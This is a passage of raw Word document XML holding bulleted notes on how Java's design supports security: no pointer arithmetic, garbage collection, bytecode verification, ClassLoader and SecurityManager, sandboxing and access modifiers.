    <w:p w14:paraId="5A4E27BF" w14:textId="194C4AB5" w:rsidR="004C1F2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00F537F6" w:rsidP="00DE4CF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java was </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>designed with security in mind</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the start. Here's how it achieves that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7C7960" w14:textId="355F6E38" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00C36B26">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. No Pointer Arithmetic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B49158A" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doesn't allow direct memory access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using pointers like C/C++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC3BC8" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prevents buffer overflows, memory corruption, and access to arbitrary memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23371FAD" w14:textId="0667E928" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C36B26">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2BBCFA76">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Automatic Memory Management (Garbage Collection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C70724" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reduces memory leaks and dangling pointer issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269BB02" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM handles allocation and deallocation safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3807C8" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DE4CF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="0BE14714">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="098F4526" w14:textId="5B6855E2" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00C36B26">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Bytecode Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585C6CD7" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Before execution, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java bytecode is verified</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the JVM to ensure it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC84A1F" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Obeys access restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0752E" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Doesn't overflow/underflow memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C5189" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Has correct data types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6140B6DB" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prevents malicious or corrupted bytecode from running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB3D158" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DE4CF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5C70854F">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72D205" w14:textId="4CB39B56" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00C36B26">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. ClassLoader and SecurityManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EFD45E" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> architecture ensures classes are loaded securely and isolates class loading for apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B31016" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SecurityManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (though deprecated in Java 17+) allows you to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime access control policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617CF215" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DE4CF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="63B706A2">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11600485" w14:textId="215B2316" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00C36B26">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Sandboxing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A2395" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java applets (now obsolete) used to run in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, restricting file access, network, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5353C69F" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Still applies to custom environments like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or plugin systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF7A424" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DE4CF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7F865402">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A60E5DF" w14:textId="405DCB99" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00C36B26">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. Strong Access Modifiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F9253" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Keywords like private, protected, final prevent unwanted access or overrides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D4CB9" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>encapsulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
